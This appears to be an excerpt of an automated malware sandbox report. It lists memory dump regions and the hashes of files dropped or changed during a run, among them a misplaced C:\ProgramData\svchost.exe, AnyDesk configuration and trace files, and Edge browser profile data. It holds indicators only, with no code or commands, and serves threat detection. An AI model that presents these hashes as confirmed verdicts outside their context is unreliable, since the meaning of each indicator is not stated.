memory/1476-691-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4f26ef66e47c7e2f46ffc40e876c9c3e |
| SHA1 | 6e34ae46411302a457fab629e4aeec83e762bd0f |
| SHA256 | 73c173d93bba1e6cbcfa903b0cafee5c7294ed2a7fb367fc8d7f3c9a9a31d21f |
| SHA512 | d67d61dc1d07be26b9afa6b5db9f4c9a068a52f4d57a35e67e59451c1dcf3ae5ec0fdace31b4a9bff1fbcbdaa3830d8c1b5692bd96eebe117d3dd18d73d86723 |
C:\ProgramData\svchost.exe
| MD5 | 1b0a49b12fb2cfc89d01cf29b8d4f875 |
| SHA1 | 2bbf873025c5c95f030de72a8a68d5d2e7b23c3b |
| SHA256 | b6ed5fdbece483fba8c67c52efbc57d77e126b032bd031f4bf68224f5c96459e |
| SHA512 | 94844cbf5c3995d3d719c5d77d1c1ab3a02269d3fbd2ef1822e301bc96441976d53b169ac982015804d28fdb1e52efc59604fed0c90bb196511f70039947fe86 |
memory/2012-794-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1396-838-0x00007FFD9F280000-0x00007FFD9F291000-memory.dmp
memory/1396-842-0x00007FFD9E450000-0x00007FFD9E461000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7fadebde6c0f9438075b81bf5fafa4d4 |
| SHA1 | e5629e27e536f4a4aa53e3d84a1e8a20b29497a3 |
| SHA256 | f13566861d9dc2c3c1e988a58a101083bf4dbfdf96642498e447f2ec282e04d1 |
| SHA512 | e97cdf6f93e26fe555a42a6ccb13dbbfa7e95084acfd0775f5b0b87c28f0832ff0ce46c20a658308d930c489a5cb19e96e4eca43892e89ee141234578e710b5b |
memory/1396-871-0x00007FFD93A20000-0x00007FFD93A31000-memory.dmp
memory/1396-875-0x00007FFD8BB30000-0x00007FFD8BBAC000-memory.dmp
memory/1396-844-0x000002762E190000-0x000002762F240000-memory.dmp
memory/2152-806-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1396-877-0x00007FFD93890000-0x00007FFD938A8000-memory.dmp
memory/1396-876-0x00007FFD938B0000-0x00007FFD938C1000-memory.dmp
memory/1396-874-0x00007FFD8C1B0000-0x00007FFD8C217000-memory.dmp
memory/1396-873-0x00007FFD938D0000-0x00007FFD93900000-memory.dmp
memory/1396-872-0x00007FFD93A00000-0x00007FFD93A18000-memory.dmp
memory/1396-870-0x00007FFD99940000-0x00007FFD9995B000-memory.dmp
memory/1396-869-0x00007FFD9B5B0000-0x00007FFD9B5C1000-memory.dmp
memory/1396-868-0x00007FFD9B5D0000-0x00007FFD9B5E1000-memory.dmp
memory/1396-867-0x00007FFD9DB00000-0x00007FFD9DB11000-memory.dmp
memory/1396-865-0x00007FFD9BBD0000-0x00007FFD9BBF1000-memory.dmp
memory/1396-866-0x00007FFD9E220000-0x00007FFD9E238000-memory.dmp
memory/1396-864-0x00007FFD99780000-0x00007FFD997C1000-memory.dmp
memory/1396-831-0x00007FF6A6D60000-0x00007FF6A6E58000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd6e57aaadf01b1fa5fc65a3d3140df6 |
| SHA1 | ec2792bbc53cdbc0d2b08d076c7c8b8da6f0d8b2 |
| SHA256 | c208b71e1247aa9c53fb26af12100c8e6f1b3a693728875feaf4cd280ae1f6d7 |
| SHA512 | 5dee083398f67dfa115cfb9407b31256a8ac6039cf46f4d2a92c135096bb08bcea7ad6e1b434dbbf64541aa5186868e14ad31d08f1b35d31317dfe011cbd698f |
memory/1396-843-0x00007FFD8B230000-0x00007FFD8B43B000-memory.dmp
memory/1396-833-0x00007FFD8C220000-0x00007FFD8C4D6000-memory.dmp
memory/1396-841-0x00007FFD9E600000-0x00007FFD9E61D000-memory.dmp
memory/1396-839-0x00007FFD9E790000-0x00007FFD9E7A7000-memory.dmp
memory/1396-840-0x00007FFD9E710000-0x00007FFD9E721000-memory.dmp
memory/1396-836-0x00007FFDA2DD0000-0x00007FFDA2DE8000-memory.dmp
memory/1396-837-0x00007FFD9F690000-0x00007FFD9F6A7000-memory.dmp
memory/1396-832-0x00007FFD9E7B0000-0x00007FFD9E7E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 589725aab9f6e8ed1dab1e74f78f9e29 |
| SHA1 | 849654ab0c07d7caf265ba3caa7e90a36df5520f |
| SHA256 | a24908be028b5810204e9d20544b62621ed79186590065e0a9743d5250431391 |
| SHA512 | 6e7724b5a05e81c93832f43ad4d2018bdce3053f4b8c9828bb1b728398ffd87137826ba0803a00e5d8545dc6cefc15350cfc9efff4d924681f7786891efafc20 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
memory/2012-1001-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | cde6b28265022f5a56ba56ecf1d7913c |
| SHA1 | b5a3c617ce025d5719d958f3a53fd9f9e22adef1 |
| SHA256 | 96136d63c8f5067302be813aa5dced5c958412df6c4ebb8ba21def471f9b54ef |
| SHA512 | 5585785e55b253efec82e095a42e70d72a7177780dc96ef71ef65e290dae3a440bac6c792704cd6fd2a38e7c781015cd3f1c7879b02e9d9e6d3db7fb563272e0 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 47ca541c198967f7b063c288238e7efd |
| SHA1 | a28762caffc431ba4ec28741a1258bebf7ff7661 |
| SHA256 | a6771034463e0e16dd91e98892e04afd876f95afd2187bb2df3a346332333a98 |
| SHA512 | 67d58135e8c62c91f75795a45480266eea43eb2141a82fc6fb5549fa851ae0663651b40c6846736c596c7d2db6266414803ae89ed1dbfebbab7f71084a332234 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d51fc0c3a9cbfb3f9f336c3cb2a097d1 |
| SHA1 | 681262cc0cdb19ca221ea187a9a2b5d190d4e4ba |
| SHA256 | d3481732dcd459a51870a82d6f8eec2aa9528d50cbc3aa3bd839256322fed788 |
| SHA512 | 27b95280487c8425d1bb2f4a428b44ddf4d479bec240024a6d6c1976b297b05b325d2b3dd5d9ca3bf61617f821a882ff771945843feb6462accd1d4fd962177c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 54ccead015c9f3f3c251e0110d59f481 |
| SHA1 | 564844c495d881f85496117a083345da30474fca |
| SHA256 | b5c833e2abf9605c5e16873bed13219e5f37cb5c1361f747813855e27ae37587 |
| SHA512 | 61995ff2ef02dba17fecac34caef120957b44ed6d19d7bf4b58b94b1883d2ed61afbb4a7f9e3f5feac7aeebd6e51c26379d53897a449bdb6e6ccc7a1213b6375 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c19471e9d99ad411d02d3f3aaf398770 |
| SHA1 | 16118afdd07a90510f55046a03da78fd46037e52 |
| SHA256 | a5740e98892afa5adebeb789f0308c2a125f8b00cb96c89d73470f0666c35ced |
| SHA512 | dae34079ccbe81a955e5e1cae72c2ecda4dde4c054819ea90ac2f667fe144f1aa42572d9048b40e4a3ea6a87f3e44b9a4195b01847a521c82bcc95b877d11c0f |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | a64b2f3501e8ec53af493e78eea4d95e |
| SHA1 | 31da414b9f60da19cce23ce734d6ef68576b0114 |
| SHA256 | 4efaed1345b472f25c81357d15d5dc6658683e3cfd012e6dd1dbe7a57b780c58 |
| SHA512 | 0aa299ff355feca39e8dd99f8596cbfb65037377e8b8fe31608eb652d5c2ce5d0db1f58bef16edabd81ba0b59a2eca830ca1fe2524a381a2fd947fb413e77885 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c8f13c2c08e31581d192aee352f9694d |
| SHA1 | 4d49f2cf76b8f2c918c4c8d7b9b1cbdf75bd68fb |
| SHA256 | f723989b93dee3cd0e00da7699ab84f9581ccf67d72cc6af7aaea7e1e91acded |
| SHA512 | 58c81306e77187c1919de4dd3414c82bdcd6de9dda8edce24a128be161e82e906ef64f733a6d354c02645cf5cb1132eb015d70c2b9b5aa0b91f7383c9ffa047b |